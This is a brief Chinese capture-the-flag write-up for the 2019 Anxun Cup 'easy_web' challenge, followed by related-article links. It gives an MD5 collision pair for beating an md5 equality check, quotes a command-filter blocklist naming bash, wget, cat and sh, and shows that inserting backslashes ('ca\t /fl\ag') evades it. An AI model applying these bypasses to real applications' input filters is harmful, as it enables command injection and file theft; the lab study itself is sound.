刷題記錄:[安洵杯 2019]easy_web
[TOC]php
刷題記錄:[安洵杯 2019]easy_web
題目復現連接:https://buuoj.cn/challenges 參考連接:第二屆安洵杯2019部分writeuplinux
知識點
md5強類型碰撞
%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2 %4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2web
linux命令執行繞過
if (preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|<|>/i", $cmd)) {
echo("forbid ~");
echo "<br>";
}
如下正則能夠過濾\bash
<?php
$cmd="\\";
echo $cmd;
if (preg_match("/|\\\\|\?/i", $cmd)) {
echo("1");
}
if (preg_match("/\\\\/i", $cmd)) {
echo("2");
}
if (preg_match("/|\\|/i", $cmd)) {
echo("3");
}
if (preg_match("/|\|/i", $cmd)) {
echo("4");
}
// \1234
linux命令中能夠加\,因此甚至能夠ca\t /fl\agless
相關文章
- 1. 安洵杯 --writeup
- 2. [安洵杯 2019]easy_serialize_php
- 3. 安洵杯-crackme-wp
- 4. 安洵杯-game-wp
- 5. BUUCTF-[安洵杯 2019]easy_web
- 6. 第一屆安洵杯writeup
- 7. 【安洵杯 2019】easy-web
- 8. 刷題記錄:[強網杯 2019]Upload
- 9. 2019 安洵杯 Re 部分WP
- 10. 2020 第三屆安洵杯 MISC Writeup
- 更多相關文章...
- • ADO 添加記錄 - ADO 教程
- • ADO 更新記錄 - ADO 教程
- • Tomcat學習筆記(史上最全tomcat學習筆記)
- • Composer 安裝與使用
相關標籤/搜索
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
歡迎關注本站公眾號,獲取更多信息
